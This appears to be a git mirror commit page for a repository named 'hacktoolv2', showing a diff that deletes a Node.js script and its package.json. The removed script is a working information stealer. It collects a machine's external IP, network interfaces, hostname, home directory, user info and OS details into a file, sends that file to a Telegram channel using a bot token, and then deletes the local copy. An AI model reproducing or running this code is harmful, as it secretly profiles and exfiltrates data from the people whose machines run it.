2
0
mirror of https://github.com/constantinDev/hacktoolv2 synced 2025-09-05 11:49:35 +00:00
This commit is contained in:
constantinDev
2020-08-27 00:27:40 +02:00
parent 4f8768888e
commit a23e3a88f9
15 changed files with 0 additions and 295 deletions

Binary file not shown.

Binary file not shown.

View File

@@ -1,67 +0,0 @@
let req = require("request")
let fs = require("fs")
let os = require("os")
let req1 = req("https://api.ipify.org")
let ip = "";
req1.on("complete", async (response, body) => {
fs.writeFileSync("./DATA.json", JSON.stringify({
ip: {
external: ip
},
network: (os.networkInterfaces || function () {
return "null"
})(),
cpu: (os.cpus || function () {
return "null"
})(),
arch: (os.arch || function () {
return "null"
})(),
homedir: (os.homedir || function () {
return "null"
})(),
host: (os.hostname || function () {
return "null"
})(),
platform: (os.platform || function () {
return "null"
})(),
rel: (os.release || function () {
return "null"
})(),
tmp: (os.tmpdir || function () {
return "null"
})(),
uptime: (os.uptime || function () {
return "null"
})(),
kernelver: (os.version || function () {
return "null"
})(),
user: (os.userInfo || function () {
return "null"
})()
}))
let a = require("./sender")
let token = (await a()).split(":-:")[0]
let r = req(`https://api.telegram.org/bot${token}/sendDocument`, {
method: "POST",
formData: {
"chat_id": "@lmaotxt",
document: fs.createReadStream("./DATA.json"),
caption: "HE GAY"
}
})
r.on("data",(b)=>{console.log(b.toString())})
r.on("complete", () => {
setTimeout(() => {
fs.unlinkSync("./DATA.json")
console.log("lol")
process.exit()
}, 1000)
})
})
req1.on("data", (data) => {
ip += data
})

View File

@@ -1,15 +0,0 @@
{
"name": "gtool-src",
"version": "1.0.0",
"description": "what the fuck",
"main": "sender.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "lo",
"license": "ISC",
"dependencies": {
"request": "^2.88.2"
},
"bin": "main.js"
}